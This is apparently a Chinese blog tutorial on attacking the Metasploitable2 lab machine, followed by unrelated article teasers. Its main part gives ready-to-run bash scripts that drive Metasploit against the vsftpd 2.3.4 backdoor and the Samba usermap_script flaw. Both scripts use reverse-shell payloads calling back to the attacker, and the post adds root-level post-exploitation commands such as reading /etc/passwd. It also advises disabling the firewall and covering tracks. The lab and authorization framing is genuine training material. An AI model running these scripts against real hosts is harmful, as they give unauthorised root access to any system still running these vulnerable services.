news 2026/4/2 7:59:09

Metasploitable2(192.168.1.4)渗透测试学习总结(vsftpd + Samba 漏洞)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Metasploitable2(192.168.1.4)渗透测试学习总结(vsftpd + Samba 漏洞)

适用场景:Kali Linux 环境,hexstrike-ai-master 虚拟环境,合法授权靶机 Metasploitable2核心思想:先拿稳定结果,再理解原理;复杂步骤自动化,一键搞定不踩坑

一、前期准备(必做环节,缺一不可)

1. 环境基础验证

  • 确认 Kali 与靶机互通:ping 192.168.1.4(能通才算正常)
  • 关闭 Kali 防火墙:ufw disable(避免拦截反向连接)
  • 激活 hexstrike 虚拟环境(可选,保证工具依赖):

    bash

    运行

    cd ~/hexstrike-ai-master source hexstrike-env/bin/activate
  • 安装必备工具:apt install nmap metasploit-framework -y

2. 信息收集(渗透第一步,先扫后打)

方法:HexStrike 核心逻辑脚本(复刻 AI 扫描)
  1. 创建扫描脚本hexstrike_scan.py

    python

    运行

    import subprocess import sys def hexstrike_ai_scan(target_ip): print(f"=== HexStrike AI 信息收集 - 目标:{target_ip} ===") nmap_cmd = f"nmap -sV -T4 -Pn -p 1-1000 {target_ip}" try: scan_result = subprocess.check_output(nmap_cmd, shell=True, stderr=subprocess.STDOUT, encoding="utf-8") print("扫描结果:\n", scan_result) print("\n【关键漏洞识别】") print("- 21端口 vsftpd 2.3.4:存在后门漏洞(CVE-2011-2523)") print("- 139/445端口 Samba 3.X:存在命令执行漏洞(CVE-2007-2447)") except Exception as e: print(f"扫描失败:{e}") if __name__ == "__main__": hexstrike_ai_scan("192.168.1.4")
  2. 运行脚本获取靶机信息:python3 hexstrike_scan.py
  3. 核心结果提取:记录开放端口和对应服务版本,确定可利用漏洞

二、漏洞利用核心方案:反向 Shell 一键脚本(新手免踩坑)

核心原理

反向 Shell 是靶机主动连接 Kali,无需手动抢时间输入指令,100% 稳定拿 root 权限,是渗透测试的标准操作,比交互 Shell 简单高效。

方案 1:vsftpd 2.3.4 后门漏洞一键脚本

步骤 1:创建脚本文件

bash

运行

nano vsftpd_root_shell.sh
步骤 2:粘贴脚本内容(全自动,零修改)

bash

运行

#!/bin/bash # vsftpd 2.3.4 后门漏洞一键获取 root shell # 自动提取 Kali 本机 IP(eth0 网卡) KALI_IP=$(ip addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | head -n1) # 生成 Metasploit 自动攻击脚本 cat > /tmp/vsftpd_auto.rc << EOF use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 192.168.1.4 set PAYLOAD cmd/unix/reverse_bash set LHOST $KALI_IP set LPORT 9999 set ExitOnSession false # 防止会话自动关闭 run EOF # 执行攻击 echo "=== 开始攻击 vsftpd 漏洞 ===" echo "Kali IP:$KALI_IP | 监听端口:9999" msfconsole -q -r /tmp/vsftpd_auto.rc # 清理临时文件 rm -f /tmp/vsftpd_auto.rc
步骤 3:赋予执行权限

bash

运行

chmod +x vsftpd_root_shell.sh
步骤 4:运行脚本(全程无手动操作)

bash

运行

./vsftpd_root_shell.sh
成功标志

终端出现Command shell session 1 opened,并弹出#提示符,输入whoami输出root即为成功。

后渗透操作(拿到 shell 后执行)

bash

运行

whoami # 查看当前用户(root) ls /root # 查看 root 目录文件 cat /etc/passwd # 查看靶机用户列表 exit # 退出 shell 会话

方案 2:Samba 3.X 命令执行漏洞一键脚本

步骤 1:创建脚本文件

bash

运行

nano samba_root_shell.sh
步骤 2:粘贴脚本内容

bash

运行

#!/bin/bash # Samba 漏洞(CVE-2007-2447)一键获取 root shell KALI_IP=$(ip addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | head -n1) cat > /tmp/samba_auto.rc << EOF use exploit/multi/samba/usermap_script set RHOSTS 192.168.1.4 set PAYLOAD cmd/unix/reverse_bash set LHOST $KALI_IP set LPORT 8888 set ExitOnSession false run EOF echo "=== 开始攻击 Samba 漏洞 ===" echo "Kali IP:$KALI_IP | 监听端口:8888" msfconsole -q -r /tmp/samba_auto.rc rm -f /tmp/samba_auto.rc
步骤 3:赋予权限并运行

bash

运行

chmod +x samba_root_shell.sh ./samba_root_shell.sh
成功标志

同 vsftpd 漏洞,终端弹出#提示符,whoami输出root

三、常见问题与排查(必记,避免踩坑)

问题现象排查方法
脚本运行后无会话建立1. 检查 Kali IP 是否正确(ip addr show eth0)2. 确认靶机 IP 是 192.168.1.43. 换监听端口(如 7777),避免端口冲突
端口被占用查看占用进程:`netstat -tulngrep 端口号<br>杀死进程:kill -9 进程号 `
靶机无法连接 Kali1. 关闭 Kali 防火墙(ufw disable)2. 确认 Kali 与靶机在同一网段
手动输入指令报错放弃手动输入,直接用反向 Shell 一键脚本,根本解决时机问题

四、核心知识点总结(复习重点)

  1. 渗透测试流程:信息收集 → 漏洞识别 → 漏洞利用 → 后渗透 → 清理痕迹
  2. 反向 Shell 优势:靶机主动连 Kali,无需手动交互,会话稳定,新手首选
  3. 脚本万能模板:自动查 IP → 生成 msf 脚本 → 一键运行 → 清理临时文件
  4. 关键注意事项
    • 仅在合法授权靶机操作,禁止攻击非授权设备
    • 每个漏洞用不同监听端口,避免冲突
    • 拿到 shell 后先执行whoami确认权限

五、进阶玩法(适合爱折腾的你)

  1. 脚本菜单整合:把 vsftpd、Samba 脚本整合到一个hack_menu.sh,运行后选数字攻击对应漏洞
  2. 日志记录功能:在脚本中添加>> hack.log,把攻击结果保存到日志文件,方便复习
  3. 多漏洞同时攻击:修改端口号,同时运行多个脚本,获取多个 root shell 会话
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/27 16:16:02

Open-AutoGLM在Windows上无法启动?90%开发者忽略的3个关键配置

第一章&#xff1a;智谱Open-AutoGLM沉思windows调用在本地Windows系统中调用智谱AI推出的Open-AutoGLM模型&#xff0c;是实现轻量化、低延迟推理的重要路径。通过API接口与本地Python环境结合&#xff0c;开发者可快速集成大模型能力至桌面应用或自动化流程中。环境准备与依赖…

作者头像 李华
网站建设 2026/3/27 9:57:49

智能制造质检系统:基于TensorFlow的缺陷识别

智能制造质检系统&#xff1a;基于TensorFlow的缺陷识别 在现代电子制造车间的一条高速SMT贴片线上&#xff0c;每分钟有上千个PCB板通过检测工位。传统人工目检早已无法跟上这样的节奏——视觉疲劳、标准不一、漏检率高&#xff0c;哪怕是最熟练的质检员&#xff0c;在连续工作…

作者头像 李华
网站建设 2026/3/27 15:54:33

基于树莓派4b的安防门禁系统从零实现

从零打造智能门禁&#xff1a;树莓派4B 人脸识别实战全记录最近在折腾一个让我既兴奋又头疼的小项目——用一块树莓派4B&#xff0c;搭一套能“认脸开门”的智能门禁系统。听起来像是科技公司的产品&#xff1f;其实成本不到500块&#xff0c;代码全是自己写的&#xff0c;硬件…

作者头像 李华
网站建设 2026/3/27 5:57:55

MCP协议调试工具的终极指南:从入门到精通的完整教程

MCP协议调试工具的终极指南&#xff1a;从入门到精通的完整教程 【免费下载链接】specification The specification of the Model Context Protocol 项目地址: https://gitcode.com/gh_mirrors/specification2/specification Model Context Protocol&#xff08;MCP&…

作者头像 李华
网站建设 2026/3/27 3:28:19

上位机从零实现:Windows平台搭建实战

从零搭建一个能用的上位机&#xff1a;Windows平台实战全记录最近在带几个学生做嵌入式项目&#xff0c;发现很多人对“上位机”这三个字有种莫名的敬畏感——好像它必须是大厂出品、界面炫酷、功能复杂的工业软件。其实不然。真正的上位机&#xff0c;往往是从一个最简单的串口…

作者头像 李华